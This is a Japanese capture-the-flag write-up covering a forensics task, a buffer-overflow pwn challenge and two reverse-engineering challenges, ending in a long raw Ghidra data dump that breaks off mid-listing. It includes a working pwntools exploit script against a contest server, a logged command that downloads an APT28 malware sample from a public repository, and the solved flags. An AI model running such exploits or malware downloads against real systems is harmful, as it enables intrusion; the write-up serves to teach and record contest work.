この大会は2023/10/20 18:00(JST)~2023/10/22 18:00(JST)に開催されました。
今回もチームで参戦。結果は200点で272チーム中109位でした。
自分で解けた問題をWriteupとして書いておきます。
who-done-it (Misc)
ディスク上のファイルやシステム情報と一部のログ情報があるので、3つの質問に答える。
1問目は「侵害されたマシンのホスト名は何か」という問題。
SystemInfo\output.txtからホスト名がわかる。
DESKTOP-V2VNNIV
2問目は「侵害されたアカウントで攻撃者によってダウンロードされたマルウェアバイナリの名前は何か」という問題。
PhysicalDrive0_1\PowerShellHistory\Users\plant\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtを見ると、以下の履歴が残っている。
Download -u https://github.com/mstfknn/malware-sample-library/raw/master/APT28%20FancyBear/ZekaAPT28.bin > download.txt
ZekaAPT28.bin
3問目は「攻撃者によってシステム上に作成された不審なスケジュールされたタスクは何か」という問題。
PhysicalDrive0_1\scheduled_task\Windows\System32\Tasksのファイル一覧から怪しいものを探す。
connect_to_server
baby-bof (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { __gid_t __rgid; setvbuf(stdout,(char *)0x0,2,0); __rgid = getegid(); setresgid(__rgid,__rgid,__rgid); puts("Please enter the flag: "); vuln(); return 0; } void vuln(void) { char local_138 [304]; gets(local_138); return; } void flag(void) { char local_98 [136]; FILE *local_10; local_10 = fopen("flag.txt","r"); if (local_10 == (FILE *)0x0) { puts("Well done!! Now use exploit remote! "); /* WARNING: Subroutine does not return */ exit(0); } fgets(local_98,0x80,local_10); printf(local_98); return; }
BOFでflag関数をコールすればよい。
$ ROPgadget --binary bof | grep ": ret" 0x00000000004005de : ret 0x00000000004007a2 : retf 0xfffe
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('35.234.99.122', 31746) else: p = process('./bof') elf = ELF('./bof') ret_addr = 0x4005de flag_addr = elf.symbols['flag'] payload = b'A' * 312 payload += p64(ret_addr) payload += p64(flag_addr) data = p.recvline().decode().rstrip() print(data) print(payload) p.sendline(payload) data = p.recvrepeat(1).decode() print(data)
実行結果は以下の通り。
[+] Opening connection to 35.234.99.122 on port 31746: Done [*] '/media/sf_Shared/bof' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments Please enter the flag: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xde\x05@\x00\x00\x00\x00\x00g\x07@\x00\x00\x00\x00\x00' ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99} [*] Closed connection to 35.234.99.122 port 31746
ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99}
AwesomeOne (Reverse Engineering)
Ghidraでデコンパイルする。
int main(int argc,char **argv) { _Bool _Var1; int iVar2; time_t tVar3; size_t sVar4; char **argv-local; int argc-local; _Bool auth; size_t len; tVar3 = time((time_t *)0x0); srand((uint)tVar3); if (argc < 2) { printf("Usage: %s <key_value>\n",*argv); iVar2 = -1; } else { sVar4 = strlen(argv[1]); _Var1 = check_password(argv[1],(long)(int)sVar4); if (_Var1) { puts(&DAT_00102065); iVar2 = 0; } else { iVar2 = rand(); printf("%s",fail_msgs[iVar2 % 0xe]); iVar2 = -1; } } return iVar2; } _Bool check_password(char *passwd,size_t len) { char cVar1; size_t sVar2; size_t len-local; char *passwd-local; int result; int i; result = 0; for (i = 0; (ulong)(long)i < len; i = i + 1) { cVar1 = passwd[i]; sVar2 = strlen(enc_flag); result = result | (uint)sVar2 ^ (int)cVar1 ^ (uint)len; printf("%d",(ulong)(uint)result); } printf("%d\n",(ulong)(uint)result); return result == 0; }
$ gdb -q ./agoodone Reading symbols from ./agoodone... gdb-peda$ b *check_password Breakpoint 1 at 0x12dc: file /home/oct/Desktop/agoodone.c, line 61. gdb-peda$ run abcdefgh Starting program: /media/sf_Shared/agoodone abcdefgh [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'. Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled on'. [----------------------------------registers-----------------------------------] RAX: 0x7fffffffe205 ("abcdefgh") RBX: 0x7fffffffde48 --> 0x7fffffffe1eb ("/media/sf_Shared/agoodone") RCX: 0x7ffff7f99860 --> 0x7ffff7f99210 --> 0x8ae1c4d2452ab58d RDX: 0x8 RSI: 0x8 RDI: 0x7fffffffe205 ("abcdefgh") RBP: 0x7fffffffdd30 --> 0x2 RSP: 0x7fffffffdd08 --> 0x55555555526b (<main+130>: mov BYTE PTR [rbp-0x9],al) RIP: 0x5555555552dc (<check_password>: endbr64) R8 : 0x7ffff7f99204 --> 0xcf7c67a18352ae7d R9 : 0xceaeef56 R10: 0x3373e954 R11: 0x7ffff7fe1cf0 (<_dl_audit_preinit>: mov eax,DWORD PTR [rip+0x1b162] # 0x7ffff7ffce58 <_rtld_global_ro+888>) R12: 0x0 R13: 0x7fffffffde60 --> 0x7fffffffe20e ("CLUTTER_IM_MODULE=xim") R14: 0x0 R15: 0x7ffff7ffd000 --> 0x7ffff7ffe2c0 --> 0x555555554000 --> 0x10102464c457f EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x5555555552d5 <main+236>: mov eax,0xffffffff 0x5555555552da <main+241>: leave 0x5555555552db <main+242>: ret => 0x5555555552dc <check_password>: endbr64 0x5555555552e0 <check_password+4>: push rbp 0x5555555552e1 <check_password+5>: mov rbp,rsp 0x5555555552e4 <check_password+8>: push rbx 0x5555555552e5 <check_password+9>: sub rsp,0x28 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdd08 --> 0x55555555526b (<main+130>: mov BYTE PTR [rbp-0x9],al) 0008| 0x7fffffffdd10 --> 0x7fffffffde48 --> 0x7fffffffe1eb ("/media/sf_Shared/agoodone") 0016| 0x7fffffffdd18 --> 0x200000000 0024| 0x7fffffffdd20 --> 0x0 0032| 0x7fffffffdd28 --> 0x8 0040| 0x7fffffffdd30 --> 0x2 0048| 0x7fffffffdd38 --> 0x7ffff7ded6ca (<__libc_start_call_main+122>: mov edi,eax) 0056| 0x7fffffffdd40 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, check_password (passwd=0x0, len=0x0) at /home/oct/Desktop/agoodone.c:61 61 /home/oct/Desktop/agoodone.c: そのようなファイルやディレクトリはありません. gdb-peda$ x/10gx enc_flag 0x555555556008: 0x247626233e031106 0x2323727270247471 0x555555556018: 0x237724737d727574 0x7d74212426232721 0x555555556028: 0x7d72242072712320 0x2172712473777121 0x555555556038: 0x76207c7124727c75 0x267c20722376757d 0x555555556048: 0x73550038737c2075 0x207325203a656761
入力文字列の正解ではなく、アルゴリズムだけ利用する。最終的には1バイトの鍵とのXORをしており、フラグは"CTF{"から始まるので、enc_flagのデータの先頭と"C"をXORをして鍵を割り出す。あとはその鍵を使って復号する。
#!/usr/bin/env python3 def is_printable(s): for c in s: if c < 32 or c > 126: return False return True enc_flag = [0x247626233e031106, 0x2323727270247471, 0x237724737d727574, 0x7d74212426232721, 0x7d72242072712320, 0x2172712473777121, 0x76207c7124727c75, 0x267c20722376757d, 0x38737c2075] enc_flag = b''.join([c.to_bytes(8, 'little') for c in enc_flag]).rstrip(b'\x00') key = enc_flag[0] ^ ord('C') flag = '' for c in enc_flag: flag += chr(c ^ key) print(flag)
CTF{fc3a41a577ff10786a2fdbfcad18ef47ea78d426a47d097a49e3803f7e9c0e96}
combination (Reverse Engineering)
Ghidraでデコンパイルする。
int validator(long param_1) { long param_1-local; int var1; int var2341; var2341 = 0; while( true ) { if (0x1d < var2341) { return 1; } if ((int8_t (*) [4])(long)*(char *)(param_1 + var2341) != verify[var2341 * 9]) break; var2341 = var2341 + 1; } return -1; } verify XREF[2]: Entry Point(*), validator:001011f9(*) 00104020 30 78 34 int8_t[4 33 30 78 66 31 30 00104020 30 78 34 33 int8_t[4] "0x43" [0] XREF[2]: Entry Point(*), validator:001011f9(*) 00104020 [0] '0', 'x', '4', '3' 00104024 30 78 66 31 int8_t[4] "0xf1" [1] 00104028 30 78 32 35 int8_t[4] "0x25" [2] 0010402c 30 78 30 62 int8_t[4] "0x0b" [3] 00104030 30 78 61 63 int8_t[4] "0xac" [4] 00104034 30 78 61 32 int8_t[4] "0xa2" [5] 00104038 30 78 32 65 int8_t[4] "0x2e" [6] 0010403c 30 78 62 36 int8_t[4] "0xb6" [7] 00104040 30 78 62 32 int8_t[4] "0xb2" [8] 00104044 30 78 35 34 int8_t[4] "0x54" [9] 00104048 30 78 33 61 int8_t[4] "0x3a" [10] 0010404c 30 78 37 64 int8_t[4] "0x7d" [11] 00104050 30 78 34 66 int8_t[4] "0x4f" [12] 00104054 30 78 36 65 int8_t[4] "0x6e" [13] 00104058 30 78 31 64 int8_t[4] "0x1d" [14] 0010405c 30 78 32 65 int8_t[4] "0x2e" [15] 00104060 30 78 37 65 int8_t[4] "0x7e" [16] 00104064 30 78 64 31 int8_t[4] "0xd1" [17] 00104068 30 78 34 36 int8_t[4] "0x46" [18] 0010406c 30 78 38 61 int8_t[4] "0x8a" [19] 00104070 30 78 30 38 int8_t[4] "0x08" [20] 00104074 30 78 61 33 int8_t[4] "0xa3" [21] 00104078 30 78 36 30 int8_t[4] "0x60" [22] 0010407c 30 78 39 37 int8_t[4] "0x97" [23] 00104080 30 78 33 33 int8_t[4] "0x33" [24] 00104084 30 78 38 62 int8_t[4] "0x8b" [25] 00104088 30 78 31 61 int8_t[4] "0x1a" [26] 0010408c 30 78 37 62 int8_t[4] "0x7b" [27] 00104090 30 78 62 37 int8_t[4] "0xb7" [28] 00104094 30 78 38 63 int8_t[4] "0x8c" [29] 00104098 30 78 34 61 int8_t[4] "0x4a" [30] 0010409c 30 78 38 32 int8_t[4] "0x82" [31] 001040a0 30 78 32 66 int8_t[4] "0x2f" [32] 001040a4 30 78 39 62 int8_t[4] "0x9b" [33] 001040a8 30 78 62 31 int8_t[4] "0xb1" [34] 001040ac 30 78 34 34 int8_t[4] "0x44" [35] 001040b0 30 78 36 36 int8_t[4] "0x66" [36] 001040b4 30 78 63 39 int8_t[4] "0xc9" [37] 001040b8 30 78 35 31 int8_t[4] "0x51" [38] 001040bc 30 78 64 33 int8_t[4] "0xd3" [39] 001040c0 30 78 39 63 int8_t[4] "0x9c" [40] 001040c4 30 78 34 62 int8_t[4] "0x4b" [41] 001040c8 30 78 36 39 int8_t[4] "0x69" [42] 001040cc 30 78 64 65 int8_t[4] "0xde" [43] 001040d0 30 78 30 63 int8_t[4] "0x0c" [44] 001040d4 30 78 36 35 int8_t[4] "0x65" [45] 001040d8 30 78 30 35 int8_t[4] "0x05" [46] 001040dc 30 78 36 61 int8_t[4] "0x6a" [47] 001040e0 30 78 34 66 int8_t[4] "0x4f" [48] 001040e4 30 78 33 37 int8_t[4] "0x37" [49] 001040e8 30 78 31 37 int8_t[4] "0x17" [50] 001040ec 30 78 30 30 int8_t[4] "0x00" [51] 001040f0 30 78 36 37 int8_t[4] "0x67" [52] 001040f4 30 78 32 33 int8_t[4] "0x23" [53] 001040f8 30 78 33 34 int8_t[4] "0x34" [54] 001040fc 30 78 31 31 int8_t[4] "0x11" [55] 00104100 30 78 66 30 int8_t[4] "0xf0" [56] 00104104 30 78 36 64 int8_t[4] "0x6d" [57] 00104108 30 78 36 35 int8_t[4] "0x65" [58] 0010410c 30 78 38 31 int8_t[4] "0x81" [59] 00104110 30 78 34 30 int8_t[4] "0x40" [60] 00104114 30 78 63 38 int8_t[4] "0xc8" [61] 00104118 30 78 63 39 int8_t[4] "0xc9" [62] 0010411c 30 78 33 30 int8_t[4] "0x30" [63] 00104120 30 78 61 37 int8_t[4] "0xa7" [64] 00104124 30 78 64 33 int8_t[4] "0xd3" [65] 00104128 30 78 34 65 int8_t[4] "0x4e" [66] 0010412c 30 78 63 35 int8_t[4] "0xc5" [67] 00104130 30 78 63 30 int8_t[4] "0xc0" [68] 00104134 30 78 30 64 int8_t[4] "0x0d" [69] 00104138 30 78 32 66 int8_t[4] "0x2f" [70] 0010413c 30 78 39 37 int8_t[4] "0x97" [71] 00104140 30 78 33 32 int8_t[4] "0x32" [72] 00104144 30 78 35 66 int8_t[4] "0x5f" [73] 00104148 30 78 31 62 int8_t[4] "0x1b" [74] 0010414c 30 78 62 65 int8_t[4] "0xbe" [75] 00104150 30 78 32 35 int8_t[4] "0x25" [76] 00104154 30 78 31 61 int8_t[4] "0x1a" [77] 00104158 30 78 32 36 int8_t[4] "0x26" [78] 0010415c 30 78 35 38 int8_t[4] "0x58" [79] 00104160 30 78 30 35 int8_t[4] "0x05" [80] 00104164 30 78 33 31 int8_t[4] "0x31" [81] 00104168 30 78 61 38 int8_t[4] "0xa8" [82] 0010416c 30 78 32 39 int8_t[4] "0x29" [83] 00104170 30 78 30 39 int8_t[4] "0x09" [84] 00104174 30 78 39 65 int8_t[4] "0x9e" [85] 00104178 30 78 66 36 int8_t[4] "0xf6" [86] 0010417c 30 78 62 36 int8_t[4] "0xb6" [87] 00104180 30 78 62 63 int8_t[4] "0xbc" [88] 00104184 30 78 36 38 int8_t[4] "0x68" [89] 00104188 30 78 33 38 int8_t[4] "0x38" [90] 0010418c 30 78 66 35 int8_t[4] "0xf5" [91] 00104190 30 78 63 34 int8_t[4] "0xc4" [92] 00104194 30 78 33 36 int8_t[4] "0x36" [93] 00104198 30 78 38 31 int8_t[4] "0x81" [94] 0010419c 30 78 32 39 int8_t[4] "0x29" [95] 001041a0 30 78 64 63 int8_t[4] "0xdc" [96] 001041a4 30 78 36 35 int8_t[4] "0x65" [97] 001041a8 30 78 34 34 int8_t[4] "0x44" [98] 001041ac 30 78 33 33 int8_t[4] "0x33" [99] 001041b0 30 78 38 65 int8_t[4] "0x8e" [100] 001041b4 30 78 33 31 int8_t[4] "0x31" [101] 001041b8 30 78 38 39 int8_t[4] "0x89" [102] 001041bc 30 78 36 64 int8_t[4] "0x6d" [103] 001041c0 30 78 32 32 int8_t[4] "0x22" [104] 001041c4 30 78 64 61 int8_t[4] "0xda" [105] 001041c8 30 78 39 32 int8_t[4] "0x92" [106] 001041cc 30 78 38 37 int8_t[4] "0x87" [107] 001041d0 30 78 36 35 int8_t[4] "0x65" [108] 001041d4 30 78 35 37 int8_t[4] "0x57" [109] 001041d8 30 78 65 32 int8_t[4] "0xe2" [110] 001041dc 30 78 31 30 int8_t[4] "0x10" [111] 001041e0 30 78 35 38 int8_t[4] "0x58" [112] 001041e4 30 78 33 35 int8_t[4] "0x35" [113] 001041e8 30 78 32 65 int8_t[4] "0x2e" [114] 001041ec 30 78 36 35 int8_t[4] "0x65" [115] 001041f0 30 78 63 38 int8_t[4] "0xc8" [116] 001041f4 30 78 36 31 int8_t[4] "0x61" [117] 001041f8 30 78 63 35 int8_t[4] "0xc5" [118] 001041fc 30 78 31 30 int8_t[4] "0x10" [119] 00104200 30 78 32 30 int8_t[4] "0x20" [120] 00104204 30 78 36 66 int8_t[4] "0x6f" [121] 00104208 30 78 34 35 int8_t[4] "0x45" [122] 0010420c 30 78 38 30 int8_t[4] "0x80" [123] 00104210 30 78 32 61 int8_t[4] "0x2a" [124] 00104214 30 78 63 35 int8_t[4] "0xc5" [125] 00104218 30 78 33 33 int8_t[4] "0x33" [126] 0010421c 30 78 34 32 int8_t[4] "0x42" [127] 00104220 30 78 63 63 int8_t[4] "0xcc" [128] 00104224 30 78 64 38 int8_t[4] "0xd8" [129] 00104228 30 78 66 33 int8_t[4] "0xf3" [130] 0010422c 30 78 63 30 int8_t[4] "0xc0" [131] 00104230 30 78 35 39 int8_t[4] "0x59" [132] 00104234 30 78 66 62 int8_t[4] "0xfb" [133] 00104238 30 78 37 61 int8_t[4] "0x7a" [134] 0010423c 30 78 33 30 int8_t[4] "0x30" [135] 00104240 30 78 33 63 int8_t[4] "0x3c" [136] 00104244 30 78 65 64 int8_t[4] "0xed" [137] 00104248 30 78 65 66 int8_t[4] "0xef" [138] 0010424c 30 78 64 66 int8_t[4] "0xdf" [139] 00104250 30 78 30 32 int8_t[4] "0x02" [140] 00104254 30 78 62 32 int8_t[4] "0xb2" [141] 00104258 30 78 32 31 int8_t[4] "0x21" [142] 0010425c 30 78 31 61 int8_t[4] "0x1a" [143] 00104260 30 78 33 34 int8_t[4] "0x34" [144] 00104264 30 78 34 63 int8_t[4] "0x4c" [145] 00104268 30 78 66 62 int8_t[4] "0xfb" [146] 0010426c 30 78 35 32 int8_t[4] "0x52" [147] 00104270 30 78 30 32 int8_t[4] "0x02" [148] 00104274 30 78 32 66 int8_t[4] "0x2f" [149] 00104278 30 78 34 61 int8_t[4] "0x4a" [150] 0010427c 30 78 64 33 int8_t[4] "0xd3" [151] 00104280 30 78 38 61 int8_t[4] "0x8a" [152] 00104284 30 78 33 31 int8_t[4] "0x31" [153] 00104288 30 78 61 62 int8_t[4] "0xab" [154] 0010428c 30 78 66 33 int8_t[4] "0xf3" [155] 00104290 30 78 31 62 int8_t[4] "0x1b" [156] 00104294 30 78 30 61 int8_t[4] "0x0a" [157] 00104298 30 78 35 37 int8_t[4] "0x57" [158] 0010429c 30 78 63 63 int8_t[4] "0xcc" [159] 001042a0 30 78 37 65 int8_t[4] "0x7e" [160] 001042a4 30 78 65 63 int8_t[4] "0xec" [161] 001042a8 30 78 33 37 int8_t[4] "0x37" [162] 001042ac 30 78 35 63 int8_t[4] "0x5c" [163] 001042b0 30 78 61 32 int8_t[4] "0xa2" [164] 001042b4 30 78 65 39 int8_t[4] "0xe9" [165] 001042b8 30 78 36 62 int8_t[4] "0x6b" [166] 001042bc 30 78 62 62 int8_t[4] "0xbb" [167] 001042c0 30 78 34 37 int8_t[4] "0x47" [168] 001042c4 30 78 34 39 int8_t[4] "0x49" [169] 001042c8 30 78 35 35 int8_t[4] "0x55" [170] 001042cc 30 78 36 36 int8_t[4] "0x66" [171] 001042d0 30 78 65 66 int8_t[4] "0xef" [172] 001042d4 30 78 30 34 int8_t[4] "0x04" [173] 001042d8 30 78 33 39 int8_t[4] "0x39" [174] 001042dc 30 78 64 65 int8_t[4] "0xde" [175] 001042e0 30 78 31 35 int8_t[4] "0x15" [176] 001042e4 30 78 63 33 int8_t[4] "0xc3" [177] 001042e8 30 78 66 30 int8_t[4] "0xf0" [178] 001042ec 30 78 39 37 int8_t[4] "0x97" [179] 001042f0 30 78 33 35 int8_t[4] "0x35" [180] 001042f4 30 78 66 64 int8_t[4] "0xfd" [181] 001042f8 30 78 34 37 int8_t[4] "0x47" [182] 001042fc 30 78 32 38 int8_t[4] "0x28" [183] 00104300 30 78 63 64 int8_t[4] "0xcd" [184] 00104304 30 78 33 33 int8_t[4] "0x33" [185] 00104308 30 78 33 38 int8_t[4] "0x38" [186] 0010430c 30 78 32 61 int8_t[4] "0x2a" [187] 00104310 30 78 38 65 int8_t[4] "0x8e" [188] 00104314 30 78 36 34 int8_t[4] "0x64" [189] 00104318 30 78 32 39 int8_t[4] "0x29" [190] 0010431c 30 78 61 33 int8_t[4] "0xa3" [191] 00104320 30 78 39 31 int8_t[4] "0x91" [192] 00104324 30 78 66 36 int8_t[4] "0xf6" [193] 00104328 30 78 39 65 int8_t[4] "0x9e" [194] 0010432c 30 78 64 36 int8_t[4] "0xd6" [195] 00104330 30 78 65 65 int8_t[4] "0xee" [196] 00104334 30 78 38 36 int8_t[4] "0x86" [197] 00104338 30 78 33 33 int8_t[4] "0x33" [198] 0010433c 30 78 62 34 int8_t[4] "0xb4" [199] 00104340 30 78 62 64 int8_t[4] "0xbd" [200] 00104344 30 78 35 62 int8_t[4] "0x5b" [201] 00104348 30 78 61 37 int8_t[4] "0xa7" [202] 0010434c 30 78 36 62 int8_t[4] "0x6b" [203] 00104350 30 78 66 64 int8_t[4] "0xfd" [204] 00104354 30 78 66 64 int8_t[4] "0xfd" [205] 00104358 30 78 30 32 int8_t[4] "0x02" [206] 0010435c 30 78 33 33 int8_t[4] "0x33" [207] 00104360 30 78 34 34 int8_t[4] "0x44" [208] 00104364 30 78 66 64 int8_t[4] "0xfd" [209] 00104368 30 78 31 66 int8_t[4] "0x1f" [210] 0010436c 30 78 35 64 int8_t[4] "0x5d" [211] 00104370 30 78 34 62 int8_t[4] "0x4b" [212] 00104374 30 78 65 32 int8_t[4] "0xe2" [213] 00104378 30 78 39 63 int8_t[4] "0x9c" [214] 0010437c 30 78 31 66 int8_t[4] "0x1f" [215] 00104380 30 78 33 33 int8_t[4] "0x33" [216] 00104384 30 78 32 65 int8_t[4] "0x2e" [217] 00104388 30 78 39 31 int8_t[4] "0x91" [218] 0010438c 30 78 66 35 int8_t[4] "0xf5" [219] 00104390 30 78 38 33 int8_t[4] "0x83" [220] 00104394 30 78 65 36 int8_t[4] "0xe6" [221] 00104398 30 78 39 37 int8_t[4] "0x97" [222] 0010439c 30 78 61 64 int8_t[4] "0xad" [223] 001043a0 30 78 30 62 int8_t[4] "0x0b" [224] 001043a4 30 78 36 32 int8_t[4] "0x62" [225] 001043a8 30 78 31 39 int8_t[4] "0x19" [226] 001043ac 30 78 35 38 int8_t[4] "0x58" [227] 001043b0 30 78 62 34 int8_t[4] "0xb4" [228] 001043b4 30 78 36 35 int8_t[4] "0x65" [229] 001043b8 30 78 63 36 int8_t[4] "0xc6" [230] 001043bc 30 78 38 63 int8_t[4] "0x8c" [231] 001043c0 30 78 63 63 int8_t[4] "0xcc" [232] 001043c4 30 78 38 34 int8_t[4] "0x84" [233] 001043c8 30 78 33 34 int8_t[4] "0x34" [234] 001043cc 30 78 36 33 int8_t[4] "0x63" [235] 001043d0 30 78 63 64 int8_t[4] "0xcd" [236] 001043d4 30 78 63 63 int8_t[4] "0xcc" [237] 001043d8 30 78 64 33 int8_t[4] "0xd3" [238] 001043dc 30 78 64 66 int8_t[4] "0xdf" [239] 001043e0 30 78 65 63 int8_t[4] "0xec" [240] 001043e4 30 78 36 61 int8_t[4] "0x6a" [241] 001043e8 30 78 66 61 int8_t[4] "0xfa" [242] 001043ec 30 78 33 30 int8_t[4] "0x30" [243] 001043f0 30 78 35 33 int8_t[4] "0x53" [244] 001043f4 30 78 32 39 int8_t[4] "0x29" [245] 001043f8 30 78 34 65 int8_t[4] "0x4e" [246] 001043fc 30 78 39 37 int8_t[4] "0x97" [247] 00104400 30 78 31 64 int8_t[4] "0x1d" [248] 00104404 30 78 35 33 int8_t[4] "0x53" [249] 00104408 30 78 36 66 int8_t[4] "0x6f" [250] 0010440c 30 78 36 31 int8_t[4] "0x61" [251] 00104410 30 78 36 33 int8_t[4] "0x63" [252] 00104414 30 78 64 35 int8_t[4] "0xd5" [253] 00104418 30 78 36 61 int8_t[4] "0x6a" [254] 0010441c 30 78 31 61 int8_t[4] "0x1a" [255] 00104420 30 78 31 64 int8_t[4] "0x1d" [256] 00104424 30 78 64 66 int8_t[4] "0xdf" [257] 00104428 30 78 65 61 int8_t[4] "0xea" [258] 0010442c 30 78 35 38 int8_t[4] "0x58" [259] 00104430 30 78 63 66 int8_t[4] "0xcf" [260] 00104434 30 78 33 32 int8_t[4] "0x32" [261] 00104438 30 78 32 65 int8_t[4] "0x2e" [262] 0010443c 30 78 38 36 int8_t[4] "0x86" [263] 00104440 30 78 37 62 int8_t[4] "0x7b" [264] 00104444 30 78 39 39 int8_t[4] "0x99" [265] 00104448 30 78 32 62 int8_t[4] "0x2b" [266] 0010444c 30 78 39 34 int8_t[4] "0x94" [267] 00104450 30 78 37 38 int8_t[4] "0x78" [268] 00104454 30 78 66 34 int8_t[4] "0xf4" [269] 00104458 30 78 33 32 int8_t[4] "0x32" [270] 0010445c 30 78 63 65 int8_t[4] "0xce" [271] 00104460 30 78 31 35 int8_t[4] "0x15" [272] 00104464 30 78 33 36 int8_t[4] "0x36" [273] 00104468 30 78 39 36 int8_t[4] "0x96" [274] 0010446c 30 78 39 33 int8_t[4] "0x93" [275] 00104470 30 78 35 34 int8_t[4] "0x54" [276] 00104474 30 78 33 33 int8_t[4] "0x33" [277] 00104478 30 78 61 35 int8_t[4] "0xa5" [278] 0010447c 30 78 36 34 int8_t[4] "0x64" [279] 00104480 30 78 35 64 int8_t[4] "0x5d" [280] 00104484 30 78 65 32 int8_t[4] "0xe2" [281] 00104488 30 78 34 37 int8_t[4] "0x47" [282] 0010448c 30 78 38 64 int8_t[4] "0x8d" [283] 00104490 30 78 36 39 int8_t[4] "0x69" [284] 00104494 30 78 61 30 int8_t[4] "0xa0" [285] 00104498 30 78 66 38 int8_t[4] "0xf8" [286] 0010449c 30 78 65 39 int8_t[4] "0xe9" [287] 001044a0 30 78 33 39 int8_t[4] "0x39" [288] 001044a4 30 78 62 62 int8_t[4] "0xbb" [289] 001044a8 30 78 30 31 int8_t[4] "0x01" [290] 001044ac 30 78 64 62 int8_t[4] "0xdb" [291] 001044b0 30 78 31 65 int8_t[4] "0x1e" [292] 001044b4 30 78 64 37 int8_t[4] "0xd7" [293] 001044b8 30 78 38 61 int8_t[4] "0x8a" [294] 001044bc 30 78 35 63 int8_t[4] "0x5c" [295] 001044c0 30 78 62 61 int8_t[4] "0xba" [296] 001044c4 30 78 36 32 int8_t[4] "0x62" [297] 001044c8 30 78 61 66 int8_t[4] "0xaf" [298] 001044cc 30 78 37 30 int8_t[4] "0x70" [299] 001044d0 30 78 34 31 int8_t[4] "0x41" [300] 001044d4 30 78 63 64 int8_t[4] "0xcd" [301] 001044d8 30 78 37 65 int8_t[4] "0x7e" [302] 001044dc 30 78 34 34 int8_t[4] "0x44" [303] 001044e0 30 78 66 35 int8_t[4] "0xf5" [304] 001044e4 30 78 30 39 int8_t[4] "0x09" [305] 001044e8 30 78 33 32 int8_t[4] "0x32" [306] 001044ec 30 78 61 64 int8_t[4] "0xad" [307] 001044f0 30 78 62 33 int8_t[4] "0xb3" [308] 001044f4 30 78 39 37 int8_t[4] "0x97" [309] 001044f8 30 78 63 65 int8_t[4] "0xce" [310] 001044fc 30 78 36 38 int8_t[4] "0x68" [311] 00104500 30 78 66 63 int8_t[4] "0xfc" [312] 00104504 30 78 33 62 int8_t[4] "0x3b" [313] 00104508 30 78 65 39 int8_t[4] "0xe9" [314] 0010450c 30 78 33 36 int8_t[4] "0x36" [315] 00104510 30 78 32 62 int8_t[4] "0x2b" [316] 00104514 30 78 65 61 int8_t[4] "0xea" [317] 00104518 30 78 39 33 int8_t[4] "0x93" [318] 0010451c 30 78 39 30 int8_t[4] "0x90" [319] 00104520 30 78 33 66 int8_t[4] "0x3f" [320] 00104524 30 78 30 62 int8_t[4] "0x0b" [321] 00104528 30 78 64 35 int8_t[4] "0xd5" [322] 0010452c 30 78 65 30 int8_t[4] "0xe0" [323] 00104530 30 78 36 33 int8_t[4] "0x63" [324] 00104534 30 78 36 31 int8_t[4] "0x61" [325] 00104538 30 78 36 62 int8_t[4] "0x6b" [326] 0010453c 30 78 39 66 int8_t[4] "0x9f" [327] 00104540 30 78 37 39 int8_t[4] "0x79" [328] 00104544 30 78 34 38 int8_t[4] "0x48" [329] 00104548 30 78 34 33 int8_t[4] "0x43" [330] 0010454c 30 78 36 38 int8_t[4] "0x68" [331] 00104550 30 78 33 32 int8_t[4] "0x32" [332] 00104554 30 78 33 31 int8_t[4] "0x31" [333] 00104558 30 78 30 32 int8_t[4] "0x02" [334] 0010455c 30 78 63 31 int8_t[4] "0xc1" [335] 00104560 30 78 66 34 int8_t[4] "0xf4" [336] 00104564 30 78 33 39 int8_t[4] "0x39" [337] 00104568 30 78 65 63 int8_t[4] "0xec" [338] 0010456c 30 78 33 62 int8_t[4] "0x3b" [339] 00104570 30 78 30 63 int8_t[4] "0x0c" [340] 00104574 30 78 64 65 int8_t[4] "0xde" [341] 00104578 30 78 36 31 int8_t[4] "0x61" [342] 0010457c 30 78 30 38 int8_t[4] "0x08" [343] 00104580 30 78 61 36 int8_t[4] "0xa6" [344] 00104584 30 78 33 61 int8_t[4] "0x3a" [345] 00104588 30 78 38 38 int8_t[4] "0x88" [346] 0010458c 30 78 62 36 int8_t[4] "0xb6" [347] 00104590 30 78 30 38 int8_t[4] "0x08" [348] 00104594 30 78 62 39 int8_t[4] "0xb9" [349] 00104598 30 78 34 39 int8_t[4] "0x49" [350] 0010459c 30 78 36 35 int8_t[4] "0x65" [351] 001045a0 30 78 30 64 int8_t[4] "0x0d" [352] 001045a4 30 78 39 32 int8_t[4] "0x92" [353] 001045a8 30 78 37 65 int8_t[4] "0x7e" [354] 001045ac 30 78 32 31 int8_t[4] "0x21" [355] 001045b0 30 78 31 34 int8_t[4] "0x14" [356] 001045b4 30 78 31 37 int8_t[4] "0x17" [357] 001045b8 30 78 65 62 int8_t[4] "0xeb" [358] 001045bc 30 78 65 33 int8_t[4] "0xe3" [359] 001045c0 30 78 36 32 int8_t[4] "0x62" [360] 001045c4 30 78 65 61 int8_t[4] "0xea" [361] 001045c8 30 78 66 62 int8_t[4] "0xfb" [362] 001045cc 30 78 37 66 int8_t[4] "0x7f" [363] 001045d0 30 78 30 65 int8_t[4] "0x0e" [364] 